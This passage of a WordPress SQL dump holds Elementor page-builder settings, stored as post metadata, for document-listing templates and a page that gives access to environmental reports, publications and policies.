settings=\\\"%7B%22key%22%3A%22document%3A419%3Aby%22%2C%22before%22%3A%22By%3A%20%22%7D\\\"]\"},\"_id\":\"9db8e27\"}],\"space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"icon_align\":\"left\",\"divider_color\":\"#0A3C11\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":9,\"sizes\":[]},\"icon_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true},{\"id\":\"4395636\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.832999999999998408384271897375583648681640625},\"elements\":[{\"id\":\"fce80b4\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"d762b8d\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Adocument_cover_image%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"1f55107\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"},\"align\":\"left\",\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26001,3835,'_elementor_edit_mode','builder'),(26002,3835,'_elementor_template_type','loop'),(26003,3835,'_elementor_version','3.4.0'),(26004,3835,'_elementor_pro_version','3.3.6'),(26005,3835,'_wp_page_template','default'),(26006,3835,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:15:\"single/document\";s:10:\"preview_id\";s:4:\"3541\";}'),(26007,3835,'_elementor_data','[{\"id\":\"97b774f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d196435\"}]},\"elements\":[{\"id\":\"58e5283\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5fea59f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ef533a9\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"18398f5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true},{\"id\":\"4395636\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fce80b4\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"d762b8d\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Afile_type_image%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26009,3836,'_elementor_edit_mode','builder'),(26010,3836,'_elementor_template_type','loop'),(26011,3836,'_elementor_version','3.4.0'),(26012,3836,'_elementor_pro_version','3.3.6'),(26013,3836,'_wp_page_template','default'),(26014,3836,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:15:\"single/document\";s:10:\"preview_id\";s:4:\"3541\";}'),(26015,3836,'_elementor_data','[{\"id\":\"97b774f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d196435\"}]},\"elements\":[{\"id\":\"58e5283\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5fea59f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ef533a9\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"18398f5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":62.472},\"elements\":[{\"id\":\"ec82dac\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"766d5fb\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"type\":\"terms\",\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"c35d24b\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"taxonomy\":\"resource_category\",\"text_prefix\":\"Category:\",\"show_icon\":\"none\"},{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"796caf9\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Date Uploaded:\",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"b3c26a1\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"bede178\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Ayear%22%2C%22before%22%3A%22Year%20Published%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"bede178\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Aby%22%2C%22before%22%3A%22By%3A%20%22%7D\\\"]\"},\"_id\":\"9db8e27\"}]},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true},{\"id\":\"4395636\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":37.361},\"elements\":[{\"id\":\"fce80b4\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"d762b8d\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Afile_type_image%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26018,3837,'_elementor_edit_mode','builder'),(26019,3837,'_elementor_template_type','loop'),(26020,3837,'_elementor_version','3.4.0'),(26021,3837,'_elementor_pro_version','3.3.6'),(26022,3837,'_wp_page_template','default'),(26023,3837,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:15:\"single/document\";s:10:\"preview_id\";s:4:\"3541\";}'),(26024,3837,'_elementor_data','[{\"id\":\"97b774f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d196435\"}]},\"elements\":[{\"id\":\"58e5283\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5fea59f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ef533a9\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"18398f5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":63.596},\"elements\":[{\"id\":\"ec82dac\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"766d5fb\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"type\":\"terms\",\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"c35d24b\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"taxonomy\":\"resource_category\",\"text_prefix\":\"Category:\",\"show_icon\":\"none\"},{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"796caf9\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Date Uploaded:\",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"b3c26a1\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"bede178\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Ayear%22%2C%22before%22%3A%22Year%20Published%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"bede178\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Aby%22%2C%22before%22%3A%22By%3A%20%22%7D\\\"]\"},\"_id\":\"9db8e27\"}],\"space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"icon_align\":\"left\",\"divider_color\":\"#0A3C11\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"icon_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true},{\"id\":\"4395636\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":36.237},\"elements\":[{\"id\":\"fce80b4\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"d762b8d\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Afile_type_image%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26036,3839,'_elementor_edit_mode','builder'),(26037,3839,'_elementor_template_type','wp-page'),(26038,3839,'_elementor_version','2.7.5'),(26039,3839,'_wp_page_template','default'),(26040,3839,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(26041,3840,'_elementor_edit_mode','builder'),(26042,3840,'_elementor_template_type','wp-page'),(26043,3840,'_elementor_version','2.7.5'),(26044,3840,'_wp_page_template','default'),(26045,3840,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(26046,3841,'_elementor_edit_mode','builder'),(26047,3841,'_elementor_template_type','wp-page'),(26048,3841,'_elementor_version','2.7.5'),(26049,3841,'_wp_page_template','default'),(26050,3841,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26052,91,'_elementor_pro_version','3.3.6'),(26054,3842,'_elementor_edit_mode','builder'),(26055,3842,'_elementor_template_type','loop'),(26056,3842,'_elementor_version','3.4.0'),(26057,3842,'_elementor_pro_version','3.3.6'),(26058,3842,'_wp_page_template','default'),(26059,3842,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:15:\"single/document\";s:10:\"preview_id\";s:4:\"3541\";}'),(26060,3842,'_elementor_data','[{\"id\":\"97b774f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d196435\"}]},\"elements\":[{\"id\":\"58e5283\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5fea59f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ef533a9\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"18398f5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":63.596},\"elements\":[{\"id\":\"ec82dac\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"align\":\"left\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"766d5fb\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"type\":\"terms\",\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"c35d24b\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"taxonomy\":\"resource_category\",\"text_prefix\":\"Category:\",\"show_icon\":\"none\"},{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"796caf9\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Date Uploaded:\",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"b3c26a1\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"bede178\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Ayear%22%2C%22before%22%3A%22Year%20Published%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"bede178\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Aby%22%2C%22before%22%3A%22By%3A%20%22%7D\\\"]\"},\"_id\":\"9db8e27\"}],\"space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"icon_align\":\"left\",\"divider_color\":\"#0A3C11\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"icon_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true},{\"id\":\"4395636\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":36.237},\"elements\":[{\"id\":\"fce80b4\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"d762b8d\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Afile_type_image%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26065,3843,'_elementor_edit_mode','builder'),(26066,3843,'_elementor_template_type','loop'),(26067,3843,'_elementor_version','3.4.0'),(26068,3843,'_elementor_pro_version','3.3.6'),(26069,3843,'_wp_page_template','default'),(26070,3843,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:15:\"single/document\";s:10:\"preview_id\";s:4:\"3541\";}'),(26071,3843,'_elementor_data','[{\"id\":\"97b774f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d196435\"}]},\"elements\":[{\"id\":\"58e5283\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5fea59f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ef533a9\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"18398f5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":37.865},\"elements\":[{\"id\":\"ec82dac\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"align\":\"left\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"766d5fb\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"type\":\"terms\",\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"c35d24b\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"taxonomy\":\"resource_category\",\"text_prefix\":\"Category:\",\"show_icon\":\"none\"},{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"796caf9\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Date Uploaded:\",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"b3c26a1\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"bede178\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Ayear%22%2C%22before%22%3A%22Year%20Published%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"bede178\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Aby%22%2C%22before%22%3A%22By%3A%20%22%7D\\\"]\"},\"_id\":\"9db8e27\"}],\"space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"icon_align\":\"left\",\"divider_color\":\"#0A3C11\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true},{\"id\":\"4395636\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":61.968},\"elements\":[{\"id\":\"fce80b4\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"d762b8d\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Afile_type_image%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26077,3844,'_elementor_edit_mode','builder'),(26078,3844,'_elementor_template_type','loop'),(26079,3844,'_elementor_version','3.4.0'),(26080,3844,'_elementor_pro_version','3.3.6'),(26081,3844,'_wp_page_template','default'),(26082,3844,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:15:\"single/document\";s:10:\"preview_id\";s:4:\"3541\";}'),(26083,3844,'_elementor_data','[{\"id\":\"97b774f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d196435\"}]},\"elements\":[{\"id\":\"58e5283\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5fea59f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ef533a9\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"18398f5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.919},\"elements\":[{\"id\":\"ec82dac\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text 